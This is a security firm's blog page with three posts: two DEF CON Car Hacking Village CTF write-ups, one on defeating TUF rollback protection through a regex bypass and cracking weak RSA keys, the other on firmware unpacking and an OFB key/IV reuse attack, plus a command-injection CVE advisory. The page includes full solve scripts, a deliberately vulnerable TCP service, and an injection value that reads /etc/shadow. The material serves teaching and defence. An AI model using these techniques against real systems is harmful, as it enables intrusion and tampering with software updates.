
Hacking Secure Software Update Systems at the DEF CON 32 Car Hacking Village

Red Balloon Security recently returned from the DEF CON hacking conference in Las Vegas, where, among other activities, we brought two computer security challenges to the Car Hacking Village (CHV) Capture The Flag (CTF) competition. The grand prize for the competition was a 2021 Tesla, and second place was several thousand dollars of NXP development kits, so we wanted to make sure our challenge problems were appropriately difficult. This competition was also a “black badge CTF” at DEF CON, which means the winners are granted free entrance to DEF CON for life.

The goal of our challenges was to force competitors to learn about secure software updates and The Update Framework (TUF), which is commonly used for securing software updates. We originally wanted to build challenge problems around defeating Uptane, an automotive-specific variant of TUF. However, there is no well-supported, public version of Uptane that we could get working, so we built the challenges around Uptane's more general ancestor, TUF, instead. Unlike Uptane, TUF is well-supported, with several up-to-date, maintained, open-source implementations.

Our two CTF challenges were designed to be solved in order – the first challenge had to be completed to begin the second. Both involved circumventing the guarantees of TUF to perform a software rollback.

Besides forcing competitors to learn the ins and outs of TUF, the challenges were designed to impress upon them that software update frameworks like TUF are only secure if they are used properly, and if they are used with secure cryptographic keys. If either of these assumptions is violated, the security of software updates can be compromised.

Both challenges ran on a Rivian Telematics Control Module (TCM) at DEF CON.

Challenge 1: Secure Updates are TUF

Challenge participants were given the following information:

  • Category: exploitation, reverse engineering

  • Description: I set up secure software updates using TUF. That way nobody can do a software rollback! Right? To connect, join the network and run:
    nc 172.28.2.64 8002
  • Intended Difficulty: easy

  • Solve Criteria: found flag

  • Tools Required: none

In addition to the description above, participants were given a tarball containing the source of the software update script (which uses the python-tuf library) and the TUF repository, whose signed metadata and update files are served over HTTP to the challenge server, which acts as a TUF client.

The run.sh script to start up the TUF server and challenge server:

				
					#!/bin/sh

set -euxm

# tuf and cryptography dependencies installed in virtual environment
source ~/venv/bin/activate

(python3 -m http.server --bind 0 --directory repository/ 38001 2>&1) | tee /tmp/web_server.log &

while sleep 3; do 
  python3 challenge_server.py --tuf-server http://localhost:38001 --server-port 38002 || fg
done

				
			

The main challenge_server.py:

				
					#!/usr/bin/env -S python3 -u
"""
Adapted from:
https://github.com/theupdateframework/python-tuf/tree/f8deca31ccea22c30060f259cb7ef2588b9c6baa/examples/client
"""


import argparse
import inspect
import json
import os
import re
import socketserver
import sys
from urllib import request

from tuf.ngclient import Updater


def parse_args():
    parser = argparse.ArgumentParser()
    for parameter in inspect.signature(main).parameters.values():
        if parameter.name.startswith("_"):
            continue
        if "KEYWORD" in parameter.kind.name:
            parser.add_argument(
                "--" + parameter.name.replace("_", "-"),
                default=parameter.default,
            )
    return parser.parse_args()


def semver(s):
    return tuple(s.lstrip("v").split("."))


def name_matches(name, f):
    return re.match(name, f)


def readline():
    result = []
    c = sys.stdin.read(1)
    while c != "\n":
        result.append(c)
        c = sys.stdin.read(1)
    result.append(c)
    return "".join(result)


class Handler(socketserver.BaseRequestHandler):
    def __init__(self, *args, tuf_server=None, updater=None, **kwargs):
        self.tuf_server = tuf_server
        self.updater = updater
        super().__init__(*args, **kwargs)

    def handle(self):
        self.request.settimeout(10)
        os.dup2(self.request.fileno(), sys.stdin.fileno())
        os.dup2(self.request.fileno(), sys.stdout.fileno())

        print("Welcome to the firmware update admin console!")
        print("What type of firmware would you like to download from the TUF server?")
        print(
            "Whichever type you pick, we will pull the latest version from the server."
        )
        print("Types:")
        with request.urlopen(f"{self.tuf_server}/targets.json") as response:
            targets = json.load(response)
        all_target_files = list(targets["signed"]["targets"].keys())
        print("-", "\n- ".join({file.split("_")[0] for file in all_target_files}))

        print("Enter type name: ")
        name = readline().strip()
        if "." in name:
            # People were trying to bypass our version check with regex tricks! Not allowed!
            print("Not allowed!")
            return
        filenames = list(
            sorted(
                [f for f in all_target_files if name_matches(name, f)],
                key=lambda s: semver(s),
            )
        )
        if len(filenames) == 0:
            print("Sorry, file not found!")
            return
        filename = filenames[-1]

        print(f"Downloading {filename}")

        info = self.updater.get_targetinfo(filename)
        if info is None:
            print("Sorry, file not found!")
            return

        with open("/dev/urandom", "rb") as f:
            name = f.read(8).hex()
        path = self.updater.download_target(
            info,
            filepath=f"/tmp/{name}.{os.path.basename(info.path)}",
        )
        os.chmod(path, 0o755)

        print(f"Running {filename}")
        child = os.fork()
        if child == 0:
            os.execl(path, path)
        else:
            os.wait()
            os.remove(path)


def main(tuf_server="http://localhost:8001", server_port="8002", **_):
    repo_metadata_dir = "/tmp/tuf_server_metadata"
    if not os.path.isdir(repo_metadata_dir):
        if os.path.exists(repo_metadata_dir):
            raise RuntimeError(
                f"{repo_metadata_dir} already exists and is not a directory"
            )
        os.mkdir(repo_metadata_dir)
        with request.urlopen(f"{tuf_server}/root.json") as response:
            root = json.load(response)
        with open(f"{repo_metadata_dir}/root.json", "w") as f:
            json.dump(root, f, indent=2)

    updater = Updater(
        metadata_dir=repo_metadata_dir,
        metadata_base_url=tuf_server + "/metadata/",
        target_base_url=tuf_server + "/targets/",
    )
    updater.refresh()

    def return_handler(*args, **kwargs):
        return Handler(*args, **kwargs, tuf_server=tuf_server, updater=updater)

    print("Running server")
    with socketserver.ForkingTCPServer(
        ("0", int(server_port)), return_handler
    ) as server:
        server.serve_forever()


if __name__ == "__main__":
    main(**parse_args().__dict__)

				
			

Also included were TUF-tracked files tcmupdate_v0.{2,3,4}.0.py.

The challenge server waits for TCP connections. When one is made, it prompts for a software file to download. It then checks the TUF server for all versions of that file (using the user input in a regular expression match) and picks the latest by parsing each filename's version string into a sortable tuple (see the check below). Once it has found the latest file, it downloads it using the TUF client functionality from the TUF library.
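
Note that the parsing here is looser than real semantic versioning. A quick standalone check (our own sketch, not part of the challenge code) shows what the key function actually produces, and why the sort still picks the highest version:

# What semver() from challenge_server.py actually returns
def semver(s):
    return tuple(s.lstrip("v").split("."))

print(semver("tcmupdate_v0.3.0.py"))
# ('tcmupdate_v0', '3', '0', 'py') -- a tuple of strings, not integers.
# The lstrip("v") is a no-op here because the name starts with "t", but the
# sort still works: the prefix is identical across versions, and the version
# digits compare correctly as strings ('2' < '3' < '4').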

The goal of this challenge is to roll back from version 0.4.0 to version 0.3.0. The key to solving this challenge is to notice the following code:

				
					# ...

def semver(s):
    return tuple(s.lstrip("v").split("."))

def name_matches(name, f):
    return re.match(name, f)

def handle_tcp():
    # ...

    name = readline().strip()
    if "." in name:
        # People were trying to bypass our version check with regex tricks! Not allowed!
        print("Not allowed!")
        return

    filenames = list(
        sorted(
            [f for f in all_target_files if name_matches(name, f)],
            key=lambda s: semver(s),
        )
    )
    if len(filenames) == 0:
        print("Sorry, file not found!")
        return
    filename = filenames[-1]

    # ...

				
			

This code first filters using the regular expression, then sorts based on the version string to find the latest matching file. Notably, the name input is used directly as a regular expression.

To circumvent the logic for only downloading the latest version of a file, we can pass an input regular expression that filters out everything except for the version we want to run. Our first instinct might be to use a regular expression like the following:

tcmupdate.*0\.3\.0.*

If we try that, however, we hit the check that blocks any input containing a . character. We now need to rewrite the regular expression to match only tcmupdate_v0.3.0, but without including the . character. One of many possible solutions is:

tcmupdate_v0[^a]3[^a]0

Since the literal . is a character that is not a, the [^a] expression will match it successfully without our input ever containing a . directly.
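
We can sanity-check the bypass with a quick script of our own:

import re

payload = "tcmupdate_v0[^a]3[^a]0"

assert "." not in payload                            # passes the blocklist check
assert re.match(payload, "tcmupdate_v0.3.0.py")      # matches the rollback target
assert not re.match(payload, "tcmupdate_v0.4.0.py")  # excludes the latest version

This input gives us the flag: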

flag{It_T4ke$-More-Than_just_TUF_for_secure_updates!}

Challenge 2: One Key to Root Them All

Challenge participants were given the following information:

  • Name: One Key to Root Them All

  • Submitter: Jacob Strieb @ Red Balloon Security

  • Category: crypto, exploitation

  • Description: Even if you roll back to an old version, you’ll never be able to access the versions I have overwritten! TUF uses crypto, so it must be super secure. You will need to have solved the previous challenge to progress to this one. To connect, join the network and run:
    nc 172.28.2.64 8002
  • Intended Difficulty: shmedium to hard

  • Solve Criteria: found flag

  • Tools Required: none

Challenge 2 can only be attempted once challenge 1 has been completed. Completing challenge 1 runs tcmupdate_v0.3.0.py on the target TCM, which prompts the user for a new TUF server address to download files from, and a new filename to download and run. The caveat is that the metadata from the original TUF server is already trusted locally, so attempts to download from a TUF server using new keys will be rejected.

In the repository/targets subdirectory of the challenge files, there are two versions of tcmupdate_v0.2.0.py: one is tracked by TUF, and the other is no longer tracked. The goal is to roll back to the old version of tcmupdate_v0.2.0.py that has been overwritten and is no longer a possible target for the TUF downloader.

The challenge files look like this:

				
					ctf/
├── challenge_server.py
├── flag_1.txt
├── flag_2.txt
├── repository
│   ├── 1.root.json
│   ├── 1.snapshot.json
│   ├── 1.targets.json
│   ├── 2.snapshot.json
│   ├── 2.targets.json
│   ├── metadata -> .
│   ├── root.json
│   ├── snapshot.json
│   ├── targets
│   │   ├── 870cba60f57b8cbee2647241760d9a89f3c91dba2664467694d7f7e4e6ffaca588f8453302f196228b426df44c01524d5c5adeb2f82c37f51bb8c38e9b0cc900.tcmupdate_v0.2.0.py
│   │   ├── 9bbef34716da8edb86011be43aa1d6ca9f9ed519442c617d88a290c1ef8d11156804dcd3e3f26c81e4c14891e1230eb505831603b75e7c43e6071e2f07de6d1a.tcmupdate_v0.2.0.py
│   │   ├── 481997bcdcdf22586bc4512ccf78954066c4ede565b886d9a63c2c66e2873c84640689612b71c32188149b5d6495bcecbf7f0d726f5234e67e8834bb5b330872.tcmupdate_v0.3.0.py
│   │   └── bc7e3e0a6ec78a2e70e70f87fbecf8a2ee4b484ce2190535c045aea48099ba218e5a968fb11b43b9fcc51de5955565a06fd043a83069e6b8f9a66654afe6ea57.tcmupdate_v0.4.0.py
│   ├── targets.json
│   └── timestamp.json
├── requirements.txt
└── run.sh

				
			

The latest version of the TUF targets.json file is only tracking the 9bbef3... hash version of the tcmupdate_v0.2.0.py file.

				
					{
  "signed": {
    "_type": "targets",
    "spec_version": "1.0",
    "version": 2,
    "expires": "2024-10-16T21:11:07Z",
    "targets": {
      "tcmupdate_v0.2.0.py": {
        "length": 54,
        "hashes": {
          "sha512": "9bbef34716da8edb86011be43aa1d6ca9f9ed519442c617d88a290c1ef8d11156804dcd3e3f26c81e4c14891e1230eb505831603b75e7c43e6071e2f07de6d1a"
        }
      },
      "tcmupdate_v0.3.0.py": {
        "length": 1791,
        "hashes": {
          "sha512": "481997bcdcdf22586bc4512ccf78954066c4ede565b886d9a63c2c66e2873c84640689612b71c32188149b5d6495bcecbf7f0d726f5234e67e8834bb5b330872"
        }
      },
      "tcmupdate_v0.4.0.py": {
        "length": 125,
        "hashes": {
          "sha512": "bc7e3e0a6ec78a2e70e70f87fbecf8a2ee4b484ce2190535c045aea48099ba218e5a968fb11b43b9fcc51de5955565a06fd043a83069e6b8f9a66654afe6ea57"
        }
      }
    }
  },
  "signatures": [
    {
      "keyid": "f1f66ca394996ea67ac7855f484d9871c8fd74e687ebab826dbaedf3b9296d14",
      "sig": "1bc2be449622a4c2b06a3c6ebe863fad8d868daf78c1e2c2922a2fe679a529a7db9a0888cd98821a66399fd36a4d5803d34c49d61b21832ff28895931539c1cca118b299c995bcd1f7b638803da481cf253e88f4e80d62e7abcc39cc92899cc540be901033793fae9253f41008bc05f70d93ef569c0d6c09644cd7dfb758c2b71e2332de7286d15cc894a51b6a6363dcde5624c68506ea54a426f7ae9055f01760c6d53f4f4f68589d89f31a01e08d45880bc28a279f8621d97ab7223c4d41ecb077176af5dd27d5c07379d99898020b23cd733e"
    }
  ]
}

				
			

Thus, in order to convince the TUF client to download the old version of tcmupdate_v0.2.0.py from a TUF file server we control, we will need to insert the correct hash into targets.json. But if we do that, we will need to re-sign targets.json, then rebuild and re-sign snapshot.json, then rebuild and re-sign timestamp.json. None of this can be accomplished without the private signing key. This means that we need to crack the signing keys in order to rebuild updated TUF metadata. Luckily, inspecting the root.json file reveals that the targets, snapshot, and timestamp roles all use the same RSA public-private keypair.

This keypair was generated using weak RSA primes that are close to one another, making the key vulnerable to a Fermat factoring attack. The attack can be performed manually, or automatically by a tool like RsaCtfTool.
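
For reference, Fermat factorization is only a few lines. Here is a minimal sketch of the technique (ours, not RsaCtfTool's implementation):

import math

def fermat_factor(n: int):
    # Search a = ceil(sqrt(n)) upward until a*a - n is a perfect square b*b;
    # then n = (a - b) * (a + b). This converges quickly when p and q are close.
    a = math.isqrt(n)
    if a * a < n:
        a += 1
    while True:
        b2 = a * a - n
        b = math.isqrt(b2)
        if b * b == b2:
            return a - b, a + b
        a += 1

# Toy example with close primes (the actual challenge modulus is much larger):
print(fermat_factor(1000003 * 1000033))  # (1000003, 1000033)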

After the key is cracked, we have to rebuild and re-sign all of the TUF metadata in sequence. This is most easily done using the go-tuf CLI from version v0.7.0 of the go-tuf library.

go install github.com/theupdateframework/go-tuf/cmd/tuf@v0.7.0

This CLI expects the keys to be in JSON format and stored in the keys subdirectory (a sibling of the repository directory). A quick Python script will convert our public and private keys from PEM format into the expected JSON.

				
					import base64
import json
import os
import sys
from nacl.secret import SecretBox
from cryptography.hazmat.primitives.kdf.scrypt import Scrypt

if len(sys.argv) < 3:
    sys.exit(f"{sys.argv[0]} <privkey> <pubkey>")

with open(sys.argv[1], "r") as f:
    private = f.read()

with open(sys.argv[2], "r") as f:
    public = f.read()

plaintext = json.dumps(
    [
        {
            "keytype": "rsa",
            "scheme": "rsassa-pss-sha256",
            "keyid_hash_algorithms": ["sha256", "sha512"],
            "keyval": {
                "private": private,
                "public": public,
            },
        },
    ]
).encode()

with open("/dev/urandom", "rb") as f:
    salt = f.read(32)
    nonce = f.read(24)
n = 65536
r = 8
p = 1

kdf = Scrypt(
    length=32,
    salt=salt,
    n=n,
    r=r,
    p=p,
)
secret_key = kdf.derive(b"redballoon")

box = SecretBox(secret_key)
ciphertext = box.encrypt(plaintext, nonce).ciphertext

print(
    json.dumps(
        {
            "encrypted": True,
            "data": {
                "kdf": {
                    "name": "scrypt",
                    "params": {
                        "N": n,
                        "r": r,
                        "p": p,
                    },
                    "salt": base64.b64encode(salt).decode(),
                },
                "cipher": {
                    "name": "nacl/secretbox",
                    "nonce": base64.b64encode(nonce).decode(),
                },
                "ciphertext": base64.b64encode(ciphertext).decode(),
            },
        },
        indent=2,
    )
)

				
			

Once we have converted all of the keys to the right format, we can run a sequence of TUF CLI commands to rebuild the metadata correctly with the cracked keys.

				
					mkdir -p staged/targets
cp repository/targets/870cba60f57b8cbee2647241760d9a89f3c91dba2664467694d7f7e4e6ffaca588f8453302f196228b426df44c01524d5c5adeb2f82c37f51bb8c38e9b0cc900.tcmupdate_v0.2.0.py staged/targets/tcmupdate_v0.2.0.py
tuf add tcmupdate_v0.2.0.py
tuf snapshot
tuf timestamp
tuf commit

				
			

Then we run our own TUF HTTP fileserver, and point the challenge server at it to get the flag.

flag{Th15_challenge-Left_me-WE4k_in-the_$$KEYS$$}

The final solve script might look something like this:

				
					#!/bin/bash

set -meuxo pipefail

tar -xvzf rbs-chv-ctf-2024.tar.gz
cd ctf

cat repository/root.json \
  | jq \
  | grep -i 'public key' \
  | sed 's/[^-]*\(-*BEGIN PUBLIC KEY-*.*-*END PUBLIC KEY-*\).*/\1/g' \
  | sed 's/\\n/\n/g' \
  > public.pem

python3 ~/Downloads/RsaCtfTool/RsaCtfTool.py --publickey public.pem --private --output private.pem

mkdir -p keys
python3 encode_key_json.py private.pem public.pem > keys/snapshot.json
cp keys/snapshot.json keys/targets.json
cp keys/snapshot.json keys/timestamp.json

mkdir -p staged/targets
cp repository/targets/870cba60f57b8cbee2647241760d9a89f3c91dba2664467694d7f7e4e6ffaca588f8453302f196228b426df44c01524d5c5adeb2f82c37f51bb8c38e9b0cc900.tcmupdate_v0.2.0.py staged/targets/tcmupdate_v0.2.0.py
tuf add tcmupdate_v0.2.0.py
tuf snapshot
tuf timestamp
tuf commit

python3 -m http.server --bind 0 --directory repository/ 8003 &
sleep 3
(
  echo 'tcmupdate_v0[^a]3'
  sleep 3
  echo 'http://172.28.2.169:8003'
  echo 'tcmupdate_v0.2.0.py'
) | nc 172.28.2.64 38002

kill %1

				
			

Conclusion

In addition to the CTF we brought to the DEF CON Car Hacking Village, we also set up a demonstration of our Symbiote host-based defense technology running on Rivian TCMs. These CTF challenges connect to that demo because the firmware rollbacks caused by exploiting the vulnerable CTF challenge application would (in a TCM protected by Symbiote) trigger alerts, and/or be blocked, depending on the customer’s desired configuration.

To reiterate, we hope that CTF participants enjoyed our challenges, and took away a few lessons:

  • Even if TUF is used correctly, logic bugs outside of TUF can be exploited to violate its guarantees

  • Even correct, reference implementations of TUF are vulnerable if the cryptographic keys used are weak

  • Secure software updates are tricky

  • There is no silver bullet in security; complementing secure software updates with on-device runtime attestation like Symbiote creates a layered, defense-in-depth strategy to ensure that attacks are thwarted

Red Balloon Security Identifies Critical Vulnerability in Kratos NGC-IDU

CVE-2023-36670 Remotely Exploitable Command Injection Vulnerability.

Introduction

Red Balloon Security researchers regularly discover and patch vulnerabilities. One such recent discovery is CVE-2023-36670, which affects the Kratos NGC-IDU 9.1.0.4 system. Let's dive into the details of this security issue.

Vulnerability Details

  • CVE ID: CVE-2023-36670

     

  • Description: A remotely exploitable command injection vulnerability was found on the Kratos NGC-IDU 9.1.0.4.

     

  • Impact: An attacker can execute arbitrary Linux commands as root by sending crafted TCP requests to the device.

Kratos NGC-IDU 9.1.0.4

The Kratos NGC-IDU system is widely used in various industries, including telecommunications, defense, and critical infrastructure. It provides essential network management and monitoring capabilities. However, like any complex software, it is susceptible to security flaws.

Exploitation Scenario

  1. Crafted TCP Requests: An attacker sends specially crafted TCP requests to the vulnerable Kratos NGC-IDU device.

     

  2. Command Injection: Due to inadequate input validation, the attacker injects malicious commands into the system (a generic sketch of this bug class follows this list).

     

  3. Root Privileges: The injected commands execute with root privileges, granting the attacker full control over the device.
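
The Kratos source is not public, so we cannot show the actual flaw. As a generic illustration of the command injection bug class, here is a minimal, hypothetical Python TCP service with the same shape of vulnerability:

import os
import socketserver

class VulnerableHandler(socketserver.StreamRequestHandler):
    def handle(self):
        # Read a "hostname" from the attacker-controlled TCP stream
        host = self.rfile.readline().decode().strip()
        # Unsanitized input reaches a shell running as root: sending
        # "127.0.0.1; cat /etc/shadow" executes the attacker's command too.
        os.system(f"ping -c 1 {host}")

with socketserver.TCPServer(("0.0.0.0", 9000), VulnerableHandler) as server:
    server.serve_forever()

Validating the input, or avoiding the shell entirely (e.g., subprocess with an argument list), closes this class of bug.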

Mitigation

  • Patch: Organizations using Kratos NGC-IDU 9.1.0.4 should apply the latest security updates promptly.

     

  • Network Segmentation: Isolate critical devices from the public network to reduce exposure.

     

  • Access Controls: Implement strict access controls to limit who can communicate with the device.

     

  • Monitoring: Monitor network traffic for suspicious activity.

Conclusion

In modern infrastructure, devices such as the Kratos NGC-IDU are at the intersection of incredible value and escalating threat. Despite functionality that is often mission critical and performance that is highly visible, these devices can be insufficiently protected, making them an inviting target. CVE-2023-36670 highlights the importance of timely patching and robust security practices. Organizations must stay vigilant, continuously assess their systems, and take proactive measures to protect against vulnerabilities.

At Red Balloon, we solve the device vulnerability gap by building security from the inside out, putting customers’ strongest line of defense at their most critical point. Red Balloon’s embedded security solutions enable customers to solve the device vulnerability gap where the greatest damage can happen and the least security exists.

For more information, refer to the official CVE-2023-36670 entry, or contact [email protected]


Hacking In-Vehicle Infotainment Systems with OFRAK 3.2.0 at DEF CON 31

Two weeks ago, Red Balloon Security attended DEF CON 31 in Las Vegas, Nevada. In addition to sponsoring and partnering with the Car Hacking Village, where we showed off some of our latest creations, we contributed two challenges to the Car Hacking Village Capture the Flag (CTF) competition. This competition was a “black badge CTF” at DEF CON, which means the winners are granted free entrance to DEF CON for life.

Since it’s been a little while since DEF CON ended, we figured we’d share a write-up of how we would go about solving the challenges. Alternatively, here is a link to an OFRAK Project (new feature since OFRAK 3.2.0!) that includes an interactive walkthrough of the challenge solves.

Challenge 1: Inside Vehicle Infotainment (IVI)

Description: Find the flag inside the firmware, but don’t get tricked by the conn man, etc.

CTF participants start off with a mysterious, 800MB binary called ivi.bin. The description hints that the file is firmware of some sort, but doesn't give much more info than that. IVI is an acronym for "In-Vehicle Infotainment," so we expect that the firmware will need to support a device with a graphical display and some sort of application runtime, though it is not yet clear whether that information will be helpful.

To begin digging into the challenge, the first thing we do is to unpack the file with OFRAK. Then, we load the unpacked result in the GUI for further exploration.

				
					# Install OFRAK
python3 -m pip install ofrak ofrak_capstone ofrak_angr

# Unpack with OFRAK and open the unpacked firmware in the GUI
ofrak unpack --gui --backend angr ./ivi.bin

				
			

When the GUI opens, we see that the outermost layer that has been unpacked is a GZIP. By selecting the only child of the GZIP in the resource tree, and then running “Identify,” we can see that OFRAK has determined that the decompressed file is firmware in Intel Hex format.

Luckily, OFRAK has an Intel Hex unpacker built-in, so we can unpack this file to keep digging for the flag.

OFRAK unpacks the Ihex into an IhexProgram. At this point, we're not sure if what we're looking at is actually a program, or a file that can unpack further. Looking at the metadata from OFRAK analysis in the bottom left pane of the GUI, we note that the file has only one large segment. This suggests that it is not a program, but rather some other file packed up in IHEX format.
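
For the curious, Intel HEX is a plain-text format where each record looks like ":llaaaatt<data><checksum>". A quick script of our own (independent of OFRAK) can eyeball the records; the filename here is hypothetical:

with open("ivi.hex") as f:  # hypothetical name for the extracted IHEX layer
    for line in list(f)[:5]:
        record = line.strip()
        if not record.startswith(":"):
            continue
        count = int(record[1:3], 16)    # ll: data byte count
        address = int(record[3:7], 16)  # aaaa: load address
        rectype = int(record[7:9], 16)  # tt: 00=data, 01=EOF, 04=ext. address
        print(f"type={rectype:02x} addr=0x{address:04x} len={count}")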

If we run “Identify” on the unpacked IhexProgram, OFRAK confirms that the “program” is actually GZIP compressed data.

To gather more information, we can make OFRAK run Binwalk analysis. This will happen automatically when clicking the “Analyze” button, or we can use the “Run Component” button to run the Binwalk analyzer manually.

Binwalk tends to have a lot of false positives, but in this case, it confirms that this resource is probably a GZIP. Since we know this, we can use the “Run Component” interface to run the GzipUnpacker and see what is inside.

Running “Identify” on the decompressed resource shows that there was a TAR archive inside. Since OFRAK can handle this easily, we click “Unpack” on the TAR. Inside of the archive, there are three files:

  • qemu.sh
  • bzImage
  • agl-ivi-demo-platform-html5-qemux86-64.ext4
 

The first file is a script to emulate the IVI system inside QEMU. The second file is the kernel for the IVI system. And the third file is the filesystem for the IVI.

Based on the bzImage kernel, the flags for QEMU in the script, and the EXT4 filesystem format, we can assume that the IVI firmware is Linux-based. Moreover, we can guess that AGL in the filename stands for “Automotive Grade Linux,” which is a big hint about what type of Linux applications we’ll encounter when we delve deeper.

Since the description talks about “conn man” and “etc,” we have a hint that it makes sense to look for the flag in the filesystem, instead of the kernel.

OFRAK has no problem with EXT filesystems, so we can select that resource and hit “Unpack” to explore this firmware further.

From here, there are two good paths to proceed. The easiest one is to use OFRAK’s new search feature to look for files containing the string flag{, which is the prefix for flags in this competition.

The second is to notice that in the hint, it mentions etc and connman, both of which are folders inside the AGL filesystem.

Navigating into the /etc/connman folder, we see a file called flag1.txt. Viewing this gives us the first flag!

flag{unp4ck_b33p_b00p_pack}
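
The same unpack-and-search flow can also be scripted with the OFRAK Python API. Here is a rough sketch of ours; exact component availability depends on your OFRAK install:

from ofrak import OFRAK, OFRAKContext

async def main(ofrak_context: OFRAKContext):
    root = await ofrak_context.create_root_resource_from_file("ivi.bin")
    await root.unpack_recursively()

    # Scan every unpacked descendant for the CTF flag prefix
    for descendant in await root.get_descendants():
        data = await descendant.get_data()
        if b"flag{" in data:
            print(descendant.get_id().hex(), data[:64])

if __name__ == "__main__":
    OFRAK().run(main)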

Challenge 2: Initialization Vector Infotainment (IVI)

Description: IVe heard there is a flag in the mechanic area, but you can’t decrypt it without a password… Right?

The hint provided with the challenge download makes it clear that this second challenge is in the same unpacked firmware as the first one. As such, the natural first step is to go looking for the “mechanic area” to find the flag.

One option is to use the qemu.sh script to try and emulate the IVI. Then it might become apparent what the description means by “mechanic area.” However, this is not necessary if you know that “apps” for Automotive Grade Linux are stored in /usr/wam_apps/<app name> in the filesystem.

Navigating directly to that directory, we can see that there is an app called html5-mecharea. One subdirectory of that folder is called chunks, and contains many files with the name flag.XXX.png. This is a pretty good hint that we’re on the right track.

The only problem is that if we try to view any of those PNG files, they appear corrupted.

Poking around the folder a bit more, we see two useful files: create.go, and app/src/App.svelte. It looks like create.go was used to break an image with the flag into chunks, and then encrypt them separately. App.svelte is responsible for taking a password from a user, and using that to try and decrypt the chunks into a viewable image.

create.go seems to be a Golang program to generate a (truly) random password string, use PBKDF2 to generate an AES key from the password, generate a truly random IV, break an image into 1024-byte chunks, encrypt each chunk with AES in OFB mode using the same key and IV, and then dump the encrypted chunks to disk.

Similarly, App.svelte does the inverse process: get a passphrase from a user, do PBKDF2 key derivation, load chunks of an image and try to decrypt them, then concatenate and display the decrypted result.

Looking at these two source files, it’s not apparent that the implementation of randomness or the crypto functions themselves are unsafe. Instead, the most eyebrow-raising aspect (as hinted by the challenge description and title) is the reuse of the same key and Initialization Vector for every chunk of plaintext.

In the OFB mode of AES, the key and IV are the inputs to the AES block cipher, and the output is chained into the next block. Then all of the blocks are used as the source of randomness for a one-time pad. Specifically, they are XORed with the plaintext to get the ciphertext. In other words, the same key and IV generate the same “randomness,” which is then XORed with each plaintext chunk to make a ciphertext chunk.
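
This is easy to demonstrate. The sketch below (our own, using the Python cryptography library rather than the challenge's Go code) shows that two ciphertexts produced with the same key and IV in OFB mode XOR together into the XOR of their plaintexts:

import os
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

def ofb_encrypt(key, iv, plaintext):
    encryptor = Cipher(algorithms.AES(key), modes.OFB(iv)).encryptor()
    return encryptor.update(plaintext) + encryptor.finalize()

key, iv = os.urandom(32), os.urandom(16)
plain_1 = b"first sixteen-byte-ish plaintext"
plain_2 = b"second plaintext of equal size!!"

cipher_1 = ofb_encrypt(key, iv, plain_1)
cipher_2 = ofb_encrypt(key, iv, plain_2)  # same key and IV reused

xor_of_ciphertexts = bytes(a ^ b for a, b in zip(cipher_1, cipher_2))
xor_of_plaintexts = bytes(a ^ b for a, b in zip(plain_1, plain_2))
assert xor_of_ciphertexts == xor_of_plaintexts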

One fun feature of the XOR function is that any value is its own inverse under XOR. The XOR function is also commutative and associative. This means that the following is true if rand_1 == rand_2, which they will be because the same key and IV generate the same randomness:

cipher_1 XOR cipher_2 == (plain_1 XOR rand_1) XOR (plain_2 XOR rand_2) 
                      == (plain_1 XOR plain_2) XOR (rand_1 XOR rand_2) 
                      == (plain_1 XOR plain_2) XOR 0000000 ... 0000000
                      == plain_1 XOR plain_2

To reiterate: the reuse of the same key and IV tells us that the rand_N values will be the same for all of the ciphertexts. This means that the result of XORing any two ciphertexts together (when the same key and IV are used in OFB mode) is the two plaintexts XORed together.

Luckily, a closer inspection of the source shows that one of the chunks is saved unencrypted in the chunks folder. The code uses it to determine whether the passphrase is correct and the beginning of the image was successfully decrypted, but we can use it to XOR known plaintext back out of the combined ciphertexts. Therefore, we are able to do the following for every ciphertext chunk number N to eventually get back all of the plaintext:

plain_1 XOR cipher_1 XOR cipher_N == plain_1 XOR (plain_1 XOR plain_N)     (by the reasoning above)
                                  == (plain_1 XOR plain_1) XOR plain_N
                                  == 00000000 ... 00000000 XOR plain_N
                                  == plain_N

The last step is to write a little code to do this for us. A simple solution in Golang is included below, but the same approach should be straightforward in your favorite programming language.

				
					package main

import (
	"crypto/aes"
	"crypto/subtle"
	"os"
	"sort"
)

func main() {
	outfile, _ := os.Create("outfile.png")

	os.Chdir("chunks")
	chunkdir, _ := os.Open(".")
	filenames, _ := chunkdir.Readdirnames(0)
	sort.Strings(filenames)

	var lastEncrypted []byte = nil
	lastDecrypted, _ := os.ReadFile("flag.unencrypted.png")
	for _, filename := range filenames {
		if filename == "flag.unencrypted.png" {
			continue
		}

		data, _ := os.ReadFile(filename)
		encryptedData := data[aes.BlockSize:]
		xorData := make([]byte, len(encryptedData))

		if lastEncrypted != nil {
			outfile.Write(lastDecrypted)
			subtle.XORBytes(xorData, encryptedData, lastEncrypted)
			subtle.XORBytes(lastDecrypted, lastDecrypted, xorData)
		}

		lastEncrypted = encryptedData
	}

	outfile.Write(lastDecrypted)
	outfile.Close()
}

				
			

When we do this and concatenate all of the plaintexts in the right order, we get a valid PNG image that contains the flag.

flag{cr4sh_syst3ms_n0t_c4rs}

Brief Tour of OFRAK 3.2.0

In the meantime, we published OFRAK 3.2.0 to PyPI on August 10!

 

As always, a detailed list of changes can be viewed in the OFRAK Changelog.

 

We’ve had several new features and quality of life improvements since our last major release.

Projects

OFRAK 3.2.0 introduces OFRAK Projects. Projects are collections of OFRAK scripts and binaries that help users organize, save, and share their OFRAK work. Accessible from the main OFRAK start page, users can now create, continue, or clone an OFRAK project with ease. With an OFRAK Project, you can run scripts on startup, easily access them from the OFRAK Resource interface, and link them to their relevant binaries. Open our example project to get started, then share your projects with the world. We can't wait to see what you make!

Search Bars

OFRAK 3.2.0 also introduces a long-awaited feature: search bars. Two new search bars are available in the OFRAK Resource interface, one in the Resource Tree pane and one in the Hex View pane. Each search bar allows the user to search for exact, case-insensitive, or regular expression strings and bytes. The Resource Tree search bar filters the tree for resources containing the search query, while the Hex View search bar scrolls to and iterates over instances of the query. The resource search functionality is also available in the Python API using resource.search_data.
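
As a hedged sketch, a scripted search might look like the following; search_data is named in the release notes above, but the exact signature and return shape shown here are our assumption:

from ofrak import OFRAK, OFRAKContext

async def main(ofrak_context: OFRAKContext):
    root = await ofrak_context.create_root_resource_from_file("firmware.bin")  # hypothetical input
    matches = await root.search_data(b"flag{")  # assumed: returns match locations
    print(matches)

if __name__ == "__main__":
    OFRAK().run(main)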

Additional Changes

  • Jefferson Filesystem (JFFS) packing/repacking support.
  • Intel Hex (ihex) packing/repacking support (useful for our Car Hacking Village DEF CON challenges).
  • EXT versions 2 – 4 packing/repacking support.

Learn More at OFRAK.COM


